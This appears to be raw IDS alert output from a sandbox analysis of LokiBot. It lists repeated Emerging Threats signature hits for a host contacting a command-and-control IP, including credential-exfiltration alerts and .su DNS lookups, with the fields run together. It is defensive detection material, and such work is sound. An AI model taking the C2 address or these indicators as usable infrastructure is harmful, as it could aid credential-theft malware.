                                    192.168.2.3104.155.55.249787802024318 06/23/22-18:09:17.520239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.852487532014169 06/23/22-18:09:36.710116UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5248753192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249745802025381 06/23/22-18:08:30.578499TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802024318 06/23/22-18:10:03.646769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249772802024318 06/23/22-18:08:53.475797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.850778532014169 06/23/22-18:08:56.029740UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5077853192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497492025483 06/23/22-18:08:35.758181TCP2025483ET TROJAN LokiBot Fake 404 Response8049749104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249772802024313 06/23/22-18:08:53.475797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249777802024313 06/23/22-18:09:04.362566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.862547532014169 06/23/22-18:09:27.695746UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6254753192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249754802024318 06/23/22-18:08:45.504366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802025381 06/23/22-18:09:22.064496TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249773802825766 06/23/22-18:08:56.128163TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249754802024313 06/23/22-18:08:45.504366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249780802024313 06/23/22-18:09:08.917855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249751802021641 06/23/22-18:08:43.382677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249832802024313 06/23/22-18:09:27.755282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802025381 06/23/22-18:09:11.023804TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802024313 06/23/22-18:10:03.646769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249892802021641 06/23/22-18:10:09.603862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.860640532014169 06/23/22-18:09:10.958098UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6064053192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249780802024318 06/23/22-18:09:08.917855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249749802024313 06/23/22-18:08:34.891799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249749802024318 06/23/22-18:08:34.891799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.864635532014169 06/23/22-18:10:03.591385UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6463553192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497732025483 06/23/22-18:08:56.994402TCP2025483ET TROJAN LokiBot Fake 404 Response8049773104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.864452532014169 06/23/22-18:08:47.827784UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6445253192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497752025483 06/23/22-18:09:00.835939TCP2025483ET TROJAN LokiBot Fake 404 Response8049775104.155.55.2192.168.2.3
                                    104.155.55.2192.168.2.380497772025483 06/23/22-18:09:05.276468TCP2025483ET TROJAN LokiBot Fake 404 Response8049777104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249858802025381 06/23/22-18:09:55.746969TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498072025483 06/23/22-18:09:22.916760TCP2025483ET TROJAN LokiBot Fake 404 Response8049807104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249744802024317 06/23/22-18:08:28.518392TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974480192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497802025483 06/23/22-18:09:09.874479TCP2025483ET TROJAN LokiBot Fake 404 Response8049780104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249879802021641 06/23/22-18:10:05.859589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249745802825766 06/23/22-18:08:30.578499TCP2825766ETPRO TROJAN LokiBot Checkin M24974580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.849873532014169 06/23/22-18:08:34.825260UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4987353192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249775802825766 06/23/22-18:08:59.805159TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.863083532014169 06/23/22-18:10:09.542700UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6308353192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497502025483 06/23/22-18:08:41.569598TCP2025483ET TROJAN LokiBot Fake 404 Response8049750104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249865802024313 06/23/22-18:09:59.728406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497712025483 06/23/22-18:08:51.674694TCP2025483ET TROJAN LokiBot Fake 404 Response8049771104.155.55.2192.168.2.3
                                    104.155.55.2192.168.2.380497542025483 06/23/22-18:08:46.411556TCP2025483ET TROJAN LokiBot Fake 404 Response8049754104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249781802825766 06/23/22-18:09:11.023804TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.863861532014169 06/23/22-18:09:13.136252UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6386153192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249746802024318 06/23/22-18:08:32.826506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249858802825766 06/23/22-18:09:55.746969TCP2825766ETPRO TROJAN LokiBot Checkin M24985880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802025381 06/23/22-18:08:50.748195TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249832802024318 06/23/22-18:09:27.755282TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802025381 06/23/22-18:08:48.152005TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498672025483 06/23/22-18:10:04.550873TCP2025483ET TROJAN LokiBot Fake 404 Response8049867104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249750802825766 06/23/22-18:08:40.626646TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249795802024313 06/23/22-18:09:20.096905TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249795802024318 06/23/22-18:09:20.096905TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.865266532014169 06/23/22-18:08:43.324751UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6526653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249743802025381 06/23/22-18:08:26.365310TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.855923532014169 06/23/22-18:08:26.293119UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5592353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857421532014169 06/23/22-18:08:32.768385UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5742153192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249895802024318 06/23/22-18:10:14.615169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.859065532014169 06/23/22-18:09:47.565594UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5906553192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249895802024313 06/23/22-18:10:14.615169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.852810532014169 06/23/22-18:08:53.418184UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5281053192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249783802825766 06/23/22-18:09:13.286095TCP2825766ETPRO TROJAN LokiBot Checkin M24978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249856802025381 06/23/22-18:09:47.624966TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802024313 06/23/22-18:08:32.826506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249787802024313 06/23/22-18:09:17.520239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.859390532014169 06/23/22-18:09:02.005884UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5939053192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249778802025381 06/23/22-18:09:06.486197TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249865802024318 06/23/22-18:09:59.728406TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498952025483 06/23/22-18:10:15.552607TCP2025483ET TROJAN LokiBot Fake 404 Response8049895104.155.55.2192.168.2.3
                                    104.155.55.2192.168.2.380498962025483 06/23/22-18:10:17.418004TCP2025483ET TROJAN LokiBot Fake 404 Response8049896104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249744802021641 06/23/22-18:08:28.518392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249842802021641 06/23/22-18:09:36.768062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.858625532014169 06/23/22-18:08:50.688333UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5862553192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497652025483 06/23/22-18:08:49.079457TCP2025483ET TROJAN LokiBot Fake 404 Response8049765104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249772802021641 06/23/22-18:08:53.475797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802024313 06/23/22-18:08:48.152005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249865802825766 06/23/22-18:09:59.728406TCP2825766ETPRO TROJAN LokiBot Checkin M24986580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249751802025381 06/23/22-18:08:43.382677TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249775802024318 06/23/22-18:08:59.805159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249776802825766 06/23/22-18:09:02.062353TCP2825766ETPRO TROJAN LokiBot Checkin M24977680192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.864412532014169 06/23/22-18:09:22.007803UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6441253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857442532014169 06/23/22-18:09:30.935127UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5744253192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249856802825766 06/23/22-18:09:47.624966TCP2825766ETPRO TROJAN LokiBot Checkin M24985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249754802021641 06/23/22-18:08:45.504366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249896802024313 06/23/22-18:10:16.412962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.853802532014169 06/23/22-18:08:40.300507UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5380253192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249751802825766 06/23/22-18:08:43.382677TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249892802024313 06/23/22-18:10:09.603862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249892802024318 06/23/22-18:10:09.603862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249750802024313 06/23/22-18:08:40.626646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497952025483 06/23/22-18:09:21.018222TCP2025483ET TROJAN LokiBot Fake 404 Response8049795104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249856802021641 06/23/22-18:09:47.624966TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249750802024318 06/23/22-18:08:40.626646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249773802021641 06/23/22-18:08:56.128163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.855795532014169 06/23/22-18:09:59.580734UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5579553192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497512025483 06/23/22-18:08:44.299706TCP2025483ET TROJAN LokiBot Fake 404 Response8049751104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249865802021641 06/23/22-18:09:59.728406TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249776802021641 06/23/22-18:09:02.062353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.859795532014169 06/23/22-18:08:59.746955UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5979553192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249896802024318 06/23/22-18:10:16.412962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249777802025381 06/23/22-18:09:04.362566TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498652025483 06/23/22-18:10:00.690473TCP2025483ET TROJAN LokiBot Fake 404 Response8049865104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249783802025381 06/23/22-18:09:13.286095TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249795802021641 06/23/22-18:09:20.096905TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249780802025381 06/23/22-18:09:08.917855TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802025381 06/23/22-18:09:30.995615TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.864589532014169 06/23/22-18:09:55.686777UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6458953192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249749802025381 06/23/22-18:08:34.891799TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249858802024318 06/23/22-18:09:55.746969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249775802024313 06/23/22-18:08:59.805159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249858802024313 06/23/22-18:09:55.746969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249754802825766 06/23/22-18:08:45.504366TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497782025483 06/23/22-18:09:07.428229TCP2025483ET TROJAN LokiBot Fake 404 Response8049778104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249795802825766 06/23/22-18:09:20.096905TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802025381 06/23/22-18:10:05.859589TCP2025381ET TROJAN LokiBot Checkin4987980192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497812025483 06/23/22-18:09:11.937966TCP2025483ET TROJAN LokiBot Fake 404 Response8049781104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249842802024318 06/23/22-18:09:36.768062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249850802025381 06/23/22-18:09:41.932837TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802825766 06/23/22-18:08:32.826506TCP2825766ETPRO TROJAN LokiBot Checkin M24974680192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.860195532014169 06/23/22-18:10:16.356290UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6019553192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380497462025483 06/23/22-18:08:33.658945TCP2025483ET TROJAN LokiBot Fake 404 Response8049746104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.858950532014169 06/23/22-18:09:41.871608UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5895053192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249778802024318 06/23/22-18:09:06.486197TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249775802021641 06/23/22-18:08:59.805159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802021641 06/23/22-18:08:48.152005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802024313 06/23/22-18:09:11.023804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802024318 06/23/22-18:09:11.023804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249895802025381 06/23/22-18:10:14.615169TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498792025483 06/23/22-18:10:06.706850TCP2025483ET TROJAN LokiBot Fake 404 Response8049879104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249745802024318 06/23/22-18:08:30.578499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.858116532014169 06/23/22-18:08:30.221090UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5811653192.168.2.38.8.8.8
                                    104.155.55.2192.168.2.380498322025483 06/23/22-18:09:28.697078TCP2025483ET TROJAN LokiBot Fake 404 Response8049832104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249743802024312 06/23/22-18:08:26.365310TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802024318 06/23/22-18:09:30.995615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249778802024313 06/23/22-18:09:06.486197TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498382025483 06/23/22-18:09:31.916398TCP2025483ET TROJAN LokiBot Fake 404 Response8049838104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.864996532014169 06/23/22-18:09:06.418101UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6499653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249750802021641 06/23/22-18:08:40.626646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249773802024318 06/23/22-18:08:56.128163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249856802024313 06/23/22-18:09:47.624966TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802024313 06/23/22-18:09:30.995615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249746802025381 06/23/22-18:08:32.826506TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249787802025381 06/23/22-18:09:17.520239TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.862724532014169 06/23/22-18:09:19.486245UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6272453192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249773802024313 06/23/22-18:08:56.128163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802024313 06/23/22-18:09:22.064496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249856802024318 06/23/22-18:09:47.624966TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249879802825766 06/23/22-18:10:05.859589TCP2825766ETPRO TROJAN LokiBot Checkin M24987980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249776802024313 06/23/22-18:09:02.062353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249772802825766 06/23/22-18:08:53.475797TCP2825766ETPRO TROJAN LokiBot Checkin M24977280192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497722025483 06/23/22-18:08:54.444254TCP2025483ET TROJAN LokiBot Fake 404 Response8049772104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249850802021641 06/23/22-18:09:41.932837TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249807802024318 06/23/22-18:09:22.064496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249743802024317 06/23/22-18:08:26.365310TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249896802021641 06/23/22-18:10:16.412962TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249744802825766 06/23/22-18:08:28.518392TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249842802825766 06/23/22-18:09:36.768062TCP2825766ETPRO TROJAN LokiBot Checkin M24984280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249745802021641 06/23/22-18:08:30.578499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249867802025381 06/23/22-18:10:03.646769TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249783802021641 06/23/22-18:09:13.286095TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802024318 06/23/22-18:08:50.748195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.3104.155.55.2
                                    192.168.2.38.8.8.864816532014169 06/23/22-18:09:04.295727UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6481653192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249832802025381 06/23/22-18:09:27.755282TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249771802024313 06/23/22-18:08:50.748195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249754802025381 06/23/22-18:08:45.504366TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249795802025381 06/23/22-18:09:20.096905TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249858802021641 06/23/22-18:09:55.746969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249765802024318 06/23/22-18:08:48.152005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497832025483 06/23/22-18:09:14.166477TCP2025483ET TROJAN LokiBot Fake 404 Response8049783104.155.55.2192.168.2.3
                                    104.155.55.2192.168.2.380497762025483 06/23/22-18:09:02.967256TCP2025483ET TROJAN LokiBot Fake 404 Response8049776104.155.55.2192.168.2.3
                                    192.168.2.38.8.8.850152532014169 06/23/22-18:09:17.432912UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5015253192.168.2.38.8.8.8
                                    192.168.2.3104.155.55.249776802024318 06/23/22-18:09:02.062353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380497872025483 06/23/22-18:09:18.447312TCP2025483ET TROJAN LokiBot Fake 404 Response8049787104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249777802825766 06/23/22-18:09:04.362566TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249743802825766 06/23/22-18:08:26.365310TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249749802825766 06/23/22-18:08:34.891799TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249838802825766 06/23/22-18:09:30.995615TCP2825766ETPRO TROJAN LokiBot Checkin M24983880192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498582025483 06/23/22-18:09:56.667986TCP2025483ET TROJAN LokiBot Fake 404 Response8049858104.155.55.2192.168.2.3
                                    192.168.2.3104.155.55.249892802025381 06/23/22-18:10:09.603862TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.3104.155.55.2
                                    192.168.2.3104.155.55.249781802021641 06/23/22-18:09:11.023804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.155.55.2
                                    104.155.55.2192.168.2.380498922025483 06/23/22-18:10:10.533295TCP2025483ET TROJAN LokiBot Fake 404 Response8049892104.155.55.2192.168.2.3
